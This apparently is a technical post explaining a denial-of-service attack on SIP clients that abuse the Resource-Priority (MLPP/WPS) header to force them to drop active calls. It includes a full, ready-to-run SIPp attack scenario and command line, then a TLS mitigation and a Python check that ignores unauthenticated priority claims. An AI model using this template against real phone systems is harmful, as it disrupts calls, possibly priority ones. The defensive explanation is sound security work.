The WPS namespace derives its name from the “Wireless Priority Service”, defined in GSM and other wireless technologies.
(lowest)  wps.4
          wps.3
          wps.2
          wps.1
(highest) wps.0

In each originating call, the namespace and the priority information are placed into the INVITE message, which is then sent. The signalling message (INVITE) received by the SIP proxy is passed to the terminating end. At that point the terminating side has to decide whether the newly arrived call is more important than an already established one.
In general, when an INVITE message is received by a client, the “from” data is not examined very thoroughly from a security point of view (the client only checks the proxy address and the domain). The reasoning is that, if it were wrong, the connection could not be established, since the reply packet would never reach the correct party and the RTP stream would never be set up.
However, when the terminating side receives MLPP high-priority call information with the INVITE message, it just drops the existing call and then tries to establish the new high-priority one. Only then is it time to establish the media path, if all the information in the INVITE is correct.
So an attacker can cause denial of service on a specific SIP client by sending continuous INVITE messages with high-priority resource headers. The attacker only needs to know the IP address, user name and SIP domain of the victim, which can be obtained easily by several techniques.
In the following lines, you can find the attack template for the tool called SIPp, which is a free open-source test tool / traffic generator for the SIP protocol. Here is the message template of the attack for SIPp.
# sipp 192.168.5.145 -sf D:/calling.txt -inf D:/calling.csv -m 1 -p 5060 -i 192.168.5.17
<?xml version="1.0" ?>
<!DOCTYPE scenario SYSTEM "sipp.dtd">

<scenario name="calling">
<send retrans="500">
<![CDATA[
INVITE sip:[field0]@[field1] SIP/2.0
Via: SIP/2.0/[transport] [local_ip]:[local_port];branch=[branch]
From: <sip:[field0]@[field1]>;tag=tmmW43DkM
To: <sip:[field2]@[field1]:[remote_port]>
CSeq: 20 INVITE
Call-ID: hb-1Thh3dE
Max-Forwards: 70
Supported: outbound
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, NOTIFY, MESSAGE, SUBSCRIBE, INFO, UPDATE
Content-Type: application/sdp
Content-Length: 556
Contact: <sip:[field0]@[local_ip]:[local_port]>;+sip.instance="<urn:uuid:1894ae7a-7a63-1155-a07d-2baf7953c0fb>"
User-Agent: [user_agent]
Resource-Priority: q735.0
Require: resource-priority

v=0
o=[field0] 517348 0 IN IP4 192.168.5.2
s=unknown@invalid
e=unknown@invalid
c=IN IP4 192.168.5.2
t=0 0
m=audio 50002 RTP/AVP 0 8 18 110 111
c=IN IP4 192.168.2.2
a=rtpmap:0 PCMU/8000
a=rtpmap:8 PCMA/8000
a=rtpmap:18 G729/8000
a=rtpmap:110 telephone-event/8000
a=rtpmap:111 X-nt-inforeq/8000
a=ptime:20
a=sendrecv
m=video 0 RTP/AVP 34
c=IN IP4 192.168.5.2
b=AS:66
b=TIAS:65536
a=rtpmap:34 H263/90000
a=fmtp:34 QCIF=3;SQCIF=3;CIF=3;F=1
a=maxprate:8.00
]]>
</send>

<recv response="100" optional="true"/>
<recv response="180" optional="true"/>
<recv response="183" optional="true"/>
<recv response="200"/>

<send>
<![CDATA[
ACK sip:[field2]@[field1] SIP/2.0
From: [field0] <sip:[field0]@[field1]:[local_port]>;tag=[call_number]
To: <sip:[field2]@[field1]>
[last_Call-ID:]
[last_Via:]
CSeq: [cseq] ACK
Content-Length: [len]
Contact: <sip:[field2]@[local_ip]:[local_port]>
Max-Forwards: 30

]]>
</send>

</scenario>
You will see that there are fields called “field0”, “field1”, “remote_port”, “local_ip”, etc. You can define variables in a separate file (in my case, calling.csv) and pass them to SIPp on the command line. These fields are required in order to form this message.
As you can see, the Resource-Priority header on the SIP call is “q735.0”, which is the highest priority in the q735 namespace. When the victim receives this priority header in the INVITE message, the victim’s SIP client drops its active low-priority call.
The prevention is actually not too complex. All user agents and proxy servers that support this extension must implement SIP over TLS [RFC3546]. However, SIP TLS brings capacity concerns due to its computational requirements for encryption and decryption.
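The check the terminating side skips in the scenario above can be sketched as follows. This is an added example, not code from the original post or from any SIP stack: it honours a Resource-Priority value only when the INVITE arrived from a TLS-authenticated, trusted proxy. The function names, the `tls_peer` parameter, the decision labels and the sample hosts are assumptions made for illustration.

```python
import re

# Priority values per namespace, lowest first. The wps order is the one listed
# on the page; q735 uses the same 4..0 scale (q735.0 highest, as the page says).
NAMESPACES = {"wps": ["4", "3", "2", "1", "0"], "q735": ["4", "3", "2", "1", "0"]}

def parse_resource_priority(raw_message):
    """Return [(namespace, value, rank)] for each recognised Resource-Priority value."""
    head = re.split(r"\r?\n\r?\n", raw_message, maxsplit=1)[0]
    found = []
    for line in head.splitlines()[1:]:            # skip the request line
        name, _, value = line.partition(":")
        if name.strip().lower() != "resource-priority":
            continue
        for item in value.split(","):             # header may carry several values
            ns, _, prio = item.strip().lower().partition(".")
            if prio in NAMESPACES.get(ns, []):
                found.append((ns, prio, NAMESPACES[ns].index(prio)))
    return found

def preemption_decision(raw_message, tls_peer, trusted_proxies, active_rank):
    """Decide how an endpoint with one established call treats a new INVITE.
    tls_peer: certificate identity verified by the TLS stack, or None for plain
    UDP/TCP. active_rank: rank of the established call (-1 if it had none).
    Comparing ranks across namespaces is a simplification for this example."""
    values = parse_resource_priority(raw_message)
    if not values:
        return "normal"
    if tls_peer is None or tls_peer not in trusted_proxies:
        return "ignore-priority"                  # unverified claim: never preempt
    if max(rank for _, _, rank in values) > active_rank:
        return "preempt"
    return "normal"

# Constructed sample INVITE (hosts and identities are placeholders).
SAMPLE_INVITE = (
    "INVITE sip:bob@example.test SIP/2.0\r\n"
    "From: <sip:alice@example.test>;tag=constructed1\r\n"
    "Resource-Priority: q735.0\r\n"
    "Require: resource-priority\r\n"
    "Content-Length: 0\r\n\r\n"
)

if __name__ == "__main__":
    trusted = {"proxy.example.test"}
    print(preemption_decision(SAMPLE_INVITE, None, trusted, active_rank=1))
    print(preemption_decision(SAMPLE_INVITE, "proxy.example.test", trusted, active_rank=1))
```

With this policy the established call survives an unauthenticated INVITE no matter what priority it claims, and logging every `ignore-priority` result gives a detection signal for repeated attempts.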